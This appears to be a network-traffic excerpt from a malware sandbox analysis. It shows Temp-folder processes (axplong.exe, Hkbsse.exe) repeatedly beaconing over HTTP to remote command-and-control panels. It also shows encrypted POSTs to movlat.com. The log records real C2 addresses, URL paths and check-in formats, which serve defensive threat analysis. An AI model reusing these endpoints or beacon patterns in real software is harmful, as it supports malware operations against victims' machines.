Jun 27, 2024 05:59:39.645543098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	49826	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:39.077541113 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:39.762932062 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:39.764090061 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:40.064013004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	49827	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:39.803622961 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:40.759937048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:40.760600090 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:40.963592052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	49828	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:40.332535028 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:41.075933933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:41.076601982 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:41.290690899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	49829	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:41.075434923 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:41.708703041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:41.709996939 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:41.900459051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.7	49830	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:41.219047070 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gvhldcwraqdveujq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: movlat.com
Jun 27, 2024 05:59:41.219058990 CEST	294	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 48 a2 f0 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA .[k,vuDH3rRkm$$Vv8 I3hq/@_PE:"P$3CMW3zQrs"Atv{RgmQ{;
Jun 27, 2024 05:59:42.339634895 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 03:59:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	49831	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:41.403088093 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:42.098809958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:42.099714041 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:42.320750952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	49832	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:42.012640953 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:42.649395943 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:42.690573931 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:42.882462025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.7	49833	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:42.347532988 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://djkehighnphvm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: movlat.com
Jun 27, 2024 05:59:42.347543955 CEST	253	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 34 29 ee a2 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vu4)QEuCw0fM"KJuZ'/UOc\,.lT^!@%el~s7SXoH1"}EvWnGT7Iy
Jun 27, 2024 05:59:43.440521002 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 03:59:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	49834	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:42.688685894 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:43.226969957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:43.227602005 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:43.445975065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	49835	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:43.016750097 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:43.721586943 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:43.724059105 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:44.008776903 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.7	49836	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:43.447390079 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fjxpubhmcddcii.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: movlat.com
Jun 27, 2024 05:59:43.451292038 CEST	266	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2e 28 c7 e0 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vu.(m(vtr\|g^z&;m^AvizjJ9RJ[pm8jKk\$17\|80w]2VjXoj":W
Jun 27, 2024 05:59:44.693876982 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 03:59:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	49837	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:43.559874058 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:44.403785944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:44.418586969 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:44.640517950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
